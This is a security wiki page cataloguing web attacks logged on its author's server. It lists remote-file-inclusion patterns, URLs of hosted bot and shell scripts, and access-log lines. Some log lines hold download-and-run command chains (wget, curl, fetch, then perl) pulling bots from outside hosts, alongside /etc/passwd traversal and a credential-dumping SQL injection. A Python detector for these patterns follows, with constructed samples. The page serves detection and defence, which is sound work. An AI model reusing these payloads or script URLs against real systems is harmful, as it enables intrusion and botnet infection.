From OSSEC Wiki


List of sites known to have Malicious php/perl scripts

Sites with PHP/Perl scripts

These are some of the sites that I have been collecting that have malicious php/perl
scripts used for web attacks (or related to trojans/worms).

Note: these sites may have malicious data.



Common attack patterns (mostly remote file inclusion)

/index2.php?x=<site>
/index.php?base_dir=<site>
/index.php?x=../../../../../../etc/passwd
/main.php?x=<site>
/error.php?dir=<site>
/main.inc&G_PATH=<site>
/htmltonuke.php?filnavn=<site>
/upgrade_album.php?GALLERY_BASEDIR=<site>
&mosConfig_absolute_path=<site>
/admin.php?cal_dir=<site>
/lib.inc.php?pm_path=<site>
/mainfile.php?MAIN_PATH=<site>
/contacts.php?cal_dir=<site>
/include.php?gorumDir=<site>
/step_one_tables.php?server_inc=<site>
/viewgantt.php?root_dir=<site>
/index.php?site=<site>
/index.php?content=<site>
/index.php?content=<any file>
/index.php?visualizar=<site>
/addevent.inc.php?agendax_path=<site>
/displayCategory.php?adminpath=<site>
/theme.php?THEME_DIR=<site>
/vw_usr_roles.php?baseDir=<site>
/initdb.php?absolute_path=<site>
/header.inc.php?serverPath=<site>
/start_lobby.php?CONFIG[MWCHAT_Libs]=<site>
/auth.php?path=<site>
.php?serverPath=<site>
onMouseOver=%22window.status='<site>
/index.php?arquivo=
/linkpoint.inc.php?config[root_dir]=<site>
/editsite.php?returnpath=<site>
/admin_xs.php?phpEx=/../../../../../../../../<file>%00
/db_connect.php?baseDir=<site>
/index.php?includeFooter=<site>
/addentry.php?phpbb_root_path=<site>
/addevent.inc.php?agendax_path=<location>
/index.php?AMG_open=comments&AMG_id=<sql_injection>
.php?dir=<site> (from setup.php?dir= print_category.php?dir= ask_password.php?dir=)
/db.php?path_local=<site>     -- PHP Loja Facil - http://www.milw0rm.com/exploits/3875


Dump of Web attack scripts

  • RFI Vulnerability scanner
  • c99shell
  • cmdphp_shell
  • ShellBOT - http:// triangle-uiuc.org/attack/zero.txt
  • no.txt - http:// intrusion.altervista.org/r0x/r0x/.../.../.../no.txt
  • ddos.pl - http:// intrusion.altervista.org/r0x/r0x/.../.../.../ddos.pl
  • lila.jpg - http:// www.houthandelpolak.nl/images/yello/.xpl/lila.jpg
  • safe.txt - http:// usuarios.arnet.com.ar/larry123/safe.txt
  • id.txt - perlbot fetcher - http:// 148.245.107.2/.ssh/id.txt
  • sela.txt - perlbot - http:// 148.245.107.2/.ssh/sela.txt
  • asc - http:// wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc????????
  • mic22 - http:// www.envio-web.com/speedy/echo.txt


Broken scripts

  • Look at G_PATH=YOURCMD (the tool's placeholder was never replaced with a real URL):
65.98.14.194 - - [03/Oct/2007:15:47:25 -0300] "GET /wiki/index.php//install/index.php?lng=../../include/main.inc&G_PATH=YOURCMD? HTTP/1.1" 200 6539 "-" "libwww-perl/5.808"


Worm/Virus sites

[Sober trojan]
home.arcor.de
scifi.pages.at
home.pages.at
free.pages.at
people.freenet.de
[Hotword trojan]
ftp.targetdata.biz
ftp.alrobertspublishing.com
bp007.no-ip.com
[Warg Bot]
media.pixpond.com/l9rd


Full URLs

87.106.75.16 - - [12/Jul/2007:12:48:32 -0300] "GET /wiki/index.php//skin/zero_vote/error.php?dir=http://geocities.yahoo.com.br/google3089/cmd.html?&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/leto/kk.txt;wget%20http://tw0team.name/leto/kk.txt;fetch%20http://tw0team.name/leto/kk.txt;curl%20-O%20http://tw0team.name/leto/kk.txt;perl%20kk.txt;rm%20-rf%20kk*? HTTP/1.1" 200 7024 "-" "libwww-perl/5.803"

213.251.187.110 - - [10/Jul/2007:05:00:57 -0300] "GET /dcid/install/index.php?lng=../../include/main.inc&G_PATH=http://legendlist.altervista.org/stringa.txt? HTTP/1.1" 200 6359 "-" "libwww-perl/5.803"

212.68.197.6 - - [10/Jul/2007:14:29:20 -0300] "GET //index.php?link=http://geocities.yahoo.com.br/google3089/cmd.html?&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/x/bn.txt;wget%20http://tw0team.name/x/bn.txt;fetch%20http://tw0team.name/x/bn.txt;curl%20-O%20http://tw0team.name/x/bn.txt;perl%20bn.txt;rm%20-rf%20bn*? HTTP/1.1" 200 6235 "-" "libwww-perl/5.76"

216.120.227.52 - - [18/Jul/2007:07:55:43 -0300] "GET /dcid/*install/index.php?lng=../../include/main.inc&G_PATH=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 6361 "-" "libwww-perl/5.803"

212.184.187.186 - - [17/Jul/2007:17:28:19 -0300] "GET //install/index.php?lng=../../include/main.inc&G_PATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 200 6235 "-" "libwww-perl/5.63"

208.116.38.148 - - [17/Jul/2007:18:31:13 -0300] "GET //install/index.php?lng=../../include/main.inc&G_PATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 200 6235 "-" "libwww-perl/5.79"

201.17.129.24 - - [22/Jul/2007:21:46:26 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://usuarios.lycos.es/poizonbox/r57.txt?? HTTP/1.1" 200 6349 "-" "libwww-perl/5.803"

69.64.37.77 - - [21/Jul/2007:16:51:25 -0300] "GET /wiki/index.php?title=Samples_of_attac...ed_by_ossec&printable=yes/install/index.php?lng=../../include/main.inc&G_PATH=http://www.visiontech-india.com/articles/images/logo2.jpg? HTTP/1.1" 200 7063 "-" "libwww-perl/5.79"

62.141.39.43 - - [26/Jul/2007:10:14:16 -0300] "GET /wiki/index.php//install/index.php?lng=../../include/main.inc&G_PATH=http://mendesrs.bravehost.com/id.txt? HTTP/1.1" 200 6933 "-" "libwww-perl/5.76"

85.12.31.79 - - [26/Jul/2007:18:13:09 -0300] "GET /wiki/index.php/WebAttacks_links//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7197 "-" "libwww-perl/5.806"

216.120.237.150 - - [26/Jul/2007:19:37:43 -0300] "GET //skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 6235 "-" "libwww-perl/5.806"

66.156.76.235 - - [27/Jul/2007:00:12:18 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7280 "-" "libwww-perl/5.76"

216.120.237.150 - - [28/Jul/2007:22:38:12 -0300] "GET /wiki/index.php//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7010 "-" "libwww-perl/5.806"

62.210.190.242 - - [28/Jul/2007:20:16:23 -0300] "GET /wiki/index.php?title=Index.php&printable=yes/*install/index.php?lng=../../include/main.inc&G_PATH=http://guilde-wow.nuxit.net/main? HTTP/1.1" 200 6762 "-" "libwww-perl/5.803"

216.200.125.254 - - [31/Jul/2007:22:01:12 -0300] "GET /htmltonuke.php?filnavn=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 6291 "-" "libwww-perl/5.75"

216.200.125.254 - - [31/Jul/2007:22:16:20 -0300] "GET /wiki/index.php/htmltonuke.php?filnavn=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 6884 "-" "libwww-perl/5.75"

216.200.125.254 - - [01/Aug/2007:11:12:28 -0300] "GET /wiki/index.php//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 7120 "-" "libwww-perl/5.75"

69.14.231.114 - - [01/Aug/2007:18:32:00 -0300] "GET /wiki/index.php/main.php?x=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../rox.txt? HTTP/1.1" 200 6834 "-" "libwww-perl/5.79"

69.14.231.114 - - [01/Aug/2007:22:26:47 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/default.php?page=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../zip.txt? HTTP/1.1" 200 7153 "-" "libwww-perl/5.79"

86.109.164.220 - - [07/Aug/2007:15:01:59 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/index.php?p=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 500 607 "-" "libwww-perl/5.79"

74.53.90.130 - - [07/Aug/2007:15:37:44 -0300] "GET /main.php?x=http://ankerz.phpnet.us/Qe3? HTTP/1.1" 500 607 "-" "libwww-perl/5.808"

209.216.253.180 - - [15/Aug/2007:15:47:04 -0300] "GET /dcid/?p=6/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),500(webadmin),2522(psaserv)%0A? HTTP/1.1" 200 11307 "-" "libwww-perl/5.65"

72.22.90.110 - - [15/Aug/2007:03:31:09 -0300] "GET /wiki/index.php/main.php?page=uid=10004(unix)%20gid=10004(unix)%20groups=10004(unix)%0A? HTTP/1.1" 200 6440 "-" "libwww-perl/5.803"

217.160.21.98 - - [14/Aug/2007:19:55:18 -0300] "GET /wiki/index.php/RFI_%3Cwbr%20/%3EVulnerability_scanner//skin/zero_vote/error.php?dir=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 200 6117 "-" "libwww-perl/5.803"

218.38.19.40 - - [27/Aug/2007:20:07:45 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"

218.38.19.40 - - [27/Aug/2007:20:07:02 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"

202.67.153.151 - - [26/Aug/2007:21:55:23 -0300] "GET /wiki/admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"

202.67.153.151 - - [26/Aug/2007:21:55:22 -0300] "GET /admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"

202.67.153.151 - - [28/Aug/2007:20:48:40 -0300] "GET /wiki/modules/tasks/viewgantt.php?root_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.803"

212.59.7.10 - - [29/Aug/2007:09:37:44 -0300] "GET /wiki/index.php/WebAttacks_links/index.php?lng=../../include/main.inc&G_PATH=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 200 6638 "-" "libwww-perl/5.65"

82.165.33.50 - - [05/Sep/2007:11:44:12 -0300] "GET /main.php?x=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 269 "-" "libwww-perl/5.69"

204.10.70.1 - - [07/Sep/2007:15:54:13 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.colorglo.it/oneadmin/calendar/.r/stringa.txt? HTTP/1.1" 200 6539 "-" "libwww-perl/5.65"

206.176.210.52 - - [07/Sep/2007:14:21:22 -0300] "GET /wiki/index.php/index.php?site=http://www.jungo8949.co.kr/tool25.txt?&cmd=cd%20/tmp;rm%20-rf%20*;cd%20/tmp;lwp-download%20http://triangle-uiuc.org/attack/zero.txt;fetch%20http://triangle-uiuc.org/attack/zero.txt;curl%20-o%20zero.txt%20http://triangle-uiuc.org/attack/zero.txt;wget%20http://triangle-uiuc.org/attack/zero.txt;perl%20zero.txt? HTTP/1.1" 200 6272 "-" "libwww-perl/5.65"

128.241.236.252 - - [09/Sep/2007:13:16:29 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.athleticbaby.com/public/templates_c/paged.gif? HTTP/1.1" 200 6539 "-" "libwww-perl/5.808"

128.241.236.252 - - [09/Sep/2007:13:28:33 -0300] "GET /wiki/index.php/OSSECWUI:Install/install/index.php?lng=../../include/main.inc&G_PATH=http://www.athleticbaby.com/public/templates_c/paged.gif? HTTP/1.1" 200 6726 "-" "libwww-perl/5.808"

209.240.96.35 - - [17/Sep/2007:13:51:52 -0300] "GET /wiki/index.php?content=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.805"

200.142.86.12 - - [14/Sep/2007:12:36:42 -0300] "GET /wiki/index.php//modules/agendax/addevent.inc.php?agendax_path=http://intrusion.hut2.ru/.../.../.../metodi.txt?? HTTP/1.1" 200 6704 "-" "libwww-perl/5.65"

81.169.128.26 - - [03/Oct/2007:03:44:22 -0300] "GET /wiki/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.69"

210.114.220.92 - - [04/Oct/2007:00:29:38 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 200 6539 "-" "libwww-perl/5.79"

202.133.244.140 - - [18/Sep/2007:17:08:46 -0300] "GET /wiki/index.php//hpgprojects/modules/admin/vw_usr_roles.php?baseDir='http://www.mk-design.com.tw/phpMyVisites/safe.txt? HTTP/1.1" 200 6814 "-" "libwww-perl/5.79"

69.72.144.66 - - [12/Oct/2007:02:09:24 -0300] "GET /wiki/calendar/events/header.inc.php?serverPath=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"

211.233.6.126 - - [13/Oct/2007:02:59:25 -0300] "GET /main.php?x=http://www.digitalcrocker.org/..%20/safe? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"

207.58.166.142 - - [15/Oct/2007:12:47:45 -0200] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://coisas.mxbr.com.br/h/rootlab.jpg?? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"

209.62.7.50 - - [14/Oct/2007:15:02:01 -0200] "GET /ossec-list/index2.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 282 "-" "libwww-perl/5.808"

85.13.133.246 - - [13/Oct/2007:20:59:27 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/index.php?page=http://www.jungo8949.co.kr/tool25.txt?&cmd=cd%20/tmp;rm%20-rf%20foi*;wget%20http://infos157.t35.com/foi.txt;cd%20/tmp;lwp-download%20http://infos157.t35.com/foi.txt;cd%20/tmp;fetch%20http://infos157.t35.com/foi.txt;cd%20/tmp;curl%20-o%20foi.txt%20http://infos157.t35.com/foi.txt;cd%20/tmp;GET%20http://infos157.t35.com/foi.txt;cd%20/tmp;lynx%20-source%20http://infos157.t35.com/foi.txt;cd%20/tmp;perl%20foi.txt;rm%20-rf%20foi.txt*? HTTP/1.1" 200 6721 "-" "libwww-perl/5.65"

87.106.11.23 - - [21/Apr/2008:10:47:13 -0300] "GET /wiki/index.php/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email)1'AND%201=1/* HTTP/1.1" 200 6381 "-" "libwww-perl/5.803"
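
As an added example (not part of the original wiki page), a small Python checker that applies the patterns from the "Common attack patterns" list to access-log lines in the combined format shown above, and counts 4xx responses per source the way the OSSEC rule 31151 alerts further down do. The sample lines, the 192.0.2.x / 198.51.100.x addresses and the attacker.example host are constructed; the threshold and window are illustrative values, not OSSEC's rule settings.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) '
                    r'[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')  # combined log format

def parse_line(line):
    """Fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return d

def classify(target):
    """Tag a request target with the attack patterns catalogued on this page."""
    tags = set()
    # Split on '&' only: the samples carry ';' inside values (cmd=cd /tmp;wget ...).
    for pair in target.partition("?")[2].split("&"):
        value = unquote_plus(pair.partition("=")[2])
        if re.match(r"https?://", value, re.I):
            tags.add("rfi")        # include parameter pointing at a remote script
        if "../" in value and "etc/passwd" in value:
            tags.add("lfi")        # traversal to a local file instead
        if re.search(r"\b(wget|curl|lwp-download|fetch)\b.*;\s*perl\b", value):
            tags.add("rce-chain")  # download-then-run chain passed via cmd=
        if re.search(r"union\s+select", value, re.I):
            tags.add("sqli")
    return tags

def scan_sources(entries, threshold=8, window=60):
    """IPs with >= threshold 4xx hits inside `window` s (cf. OSSEC rule 31151; numbers illustrative)."""
    per_ip = defaultdict(list)
    for e in entries:
        if 400 <= e["status"] < 500:
            per_ip[e["ip"]].append(e["ts"])
    flagged = set()
    for ip, times in per_ip.items():
        times.sort()
        if any((times[i + threshold - 1] - times[i]).total_seconds() <= window
               for i in range(len(times) - threshold + 1)):
            flagged.add(ip)
    return flagged

def analyse(lines):
    """Attack tags per source IP, plus the IPs that look like vulnerability scanners."""
    entries = [e for e in map(parse_line, lines) if e]
    hits = defaultdict(set)
    for e in entries:
        tags = classify(e["target"])
        if e["ua"].startswith("libwww-perl"):
            tags.add("libwww-perl")  # the user agent on nearly every sample above
        if tags:
            hits[e["ip"]] |= tags
    return dict(hits), scan_sources(entries)

# Constructed sample lines modelled on the page's (RFC 5737 addresses, attacker.example).
SAMPLE = [
    '192.0.2.10 - - [12/Jul/2007:12:48:32 -0300] "GET /skin/zero_vote/error.php?dir=http://attacker.example/cmd.html?&cmd=cd%20/tmp;wget%20http://attacker.example/kk.txt;perl%20kk.txt;rm%20-rf%20kk* HTTP/1.1" 200 7024 "-" "libwww-perl/5.803"',
    '192.0.2.11 - - [17/Sep/2007:13:51:52 -0300] "GET /index.php?content=../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.805"',
    '192.0.2.12 - - [21/Apr/2008:10:47:13 -0300] "GET /index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3 HTTP/1.1" 200 6381 "-" "libwww-perl/5.803"',
    '198.51.100.5 - - [12/Jul/2007:12:50:00 -0300] "GET /index.php?title=Main_Page HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
] + [  # eight 404s in eight seconds from one host, like the phpMyChat scan further down
    f'192.0.2.13 - - [06/Oct/2007:07:19:{20 + i:02d} -0300] "GET /{d}//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0"'
    for i, d in enumerate(["phpMyChat", "forum", "chats", "chatroom", "PhpMyChat", "phpchat", "php/phpmychat", "phpMyChat-0.14.4"])
]
```

`analyse(SAMPLE)` tags the three attack sources and flags 192.0.2.13 as a scanner while leaving the ordinary request untouched.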

MD5sum of web exploits


Just a list of MD5 checksums of tools/scripts I have been collecting:




OSSEC alerts for web attacks

Simple Scan looking for multiple vulnerabilities

OSSEC HIDS Notification.
2007 Aug 27 20:07:47

Received From: teletubbies->/var/log/httpd/ossec.access.log
Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
Portion of the log(s):

218.38.19.40 - - [27/Aug/2007:20:07:45 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:02 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:01 -0300] "GET /admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:00 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:59 -0300] "GET /admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:37 -0300] "GET /ossec-list/2007-April/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:32 -0300] "GET /index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:31 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:20 -0300] "GET /wiki/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:16 -0300] "GET /wiki/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"

Scan looking for vulnerable applications

OSSEC HIDS Notification.
2007 Oct 06 07:19:31

Received From: teletubbies->/var/log/httpd/access_log
Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
Portion of the log(s):

91.121.27.102 - - [06/Oct/2007:07:19:30 -0300] "GET /phpMyChat-0.14.4//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /phpMyChat//chat/messagesL.php3 HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /phpMyChat-0.14.5//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /phpMyChat-0.14.2//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /php/phpmychat//chat/messagesL.php3 HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /forum//chat/messagesL.php3 HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /chats//chat/messagesL.php3 HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /chatroom//chat/messagesL.php3 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /PhpMyChat//chat/messagesL.php3 HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:24 -0300] "GET /phpchat//chat/messagesL.php3 HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"



 --END OF NOTIFICATION


OSSEC HIDS Notification.
2007 Oct 06 08:06:55

Received From: teletubbies->/var/log/httpd/access_log
Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
Portion of the log(s):

91.121.27.102 - - [06/Oct/2007:08:06:54 -0300] "GET //blogs/xmlrpc.php HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:54 -0300] "GET //community/xmlrpc.php HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:54 -0300] "GET //drupal/xmlrpc.php HTTP/1.1" 404 279 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:42 -0300] "GET //phpadsnew2/adxmlrpc.php HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //phpAdsNew2/adxmlrpc.php HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //ads/adxmlrpc.php HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //Ads/adxmlrpc.php HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //phpads/adxmlrpc.php HTTP/1.1" 404 281 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:40 -0300] "GET //phpadsnew/adxmlrpc.php HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:40 -0300] "GET //phpAdsNew/adxmlrpc.php HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"



 --END OF NOTIFICATION
